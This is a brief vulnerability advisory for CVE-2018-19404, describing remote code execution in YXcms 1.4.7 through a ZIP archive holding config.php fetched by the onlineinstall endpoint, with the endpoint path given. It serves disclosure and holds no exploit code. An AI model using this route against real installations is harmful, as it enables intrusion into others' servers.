Remote Code Execution Vulnerability in YXcms 1.4.7 via ZIP Archive Upload

Remote Code Execution Vulnerability in YXcms 1.4.7 via ZIP Archive Upload

CVE-2018-19404 · MEDIUM Severity

AV:N/AC:L/AU:S/C:P/I:P/A:P

In YXcms 1.4.7, protected/apps/appmanage/controller/indexController.php allow remote authenticated Administrators to execute any PHP code by creating a ZIP archive containing a config.php file, hosting the .zip file at an external URL, and visiting index.php?r=appmanage/index/onlineinstall&url= followed by that URL. This is related to the onlineinstall and import functions.

Learn more about our Cms Pen Testing.